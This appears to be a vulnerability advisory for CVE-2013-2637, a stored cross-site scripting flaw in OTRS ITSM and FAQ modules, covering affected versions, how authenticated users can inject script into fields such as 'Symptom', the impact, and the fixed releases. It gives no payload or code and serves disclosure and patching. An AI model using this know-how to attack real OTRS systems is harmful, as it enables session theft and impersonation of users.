CVE-2013-2637

Vulnerability

A persistent Cross-Site Scripting (XSS) vulnerability exists in the OTRS ITSM and FAQ modules. The flaw resides in the handling of user-supplied content in FAQ articles, changes, and workorder items. An attacker with permission to create or edit these items can inject arbitrary JavaScript into fields such as the "Symptom" field of a FAQ article. Affected versions include OTRS ITSM prior to 3.2.4, 3.1.8, and 3.0.7, and FAQ prior to 2.1.4 and 2.0.8 [1].

Exploitation

An attacker must have the ability to add or modify FAQ articles, changes, or workorder items within the OTRS system. No special network position is required beyond normal authenticated access. The attacker inserts malicious JavaScript into a text field (e.g., the Symptom field of a FAQ). When any user—including administrators—views the affected item, the script executes in the context of the victim's session [1].

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the browser of any user viewing the compromised content. This can lead to session cookie theft, impersonation, defacement, or other client-side attacks. The attacker does not gain direct server-side access but can leverage the victim's privileges within the OTRS application [1].

Mitigation

The vulnerability is fixed in OTRS ITSM 3.2.4, 3.1.8, and 3.0.7, and in FAQ 2.1.4 and 2.0.8. Users should upgrade to these or later versions. The vendor's security advisory provides further details [1]. No workaround is documented in the available references.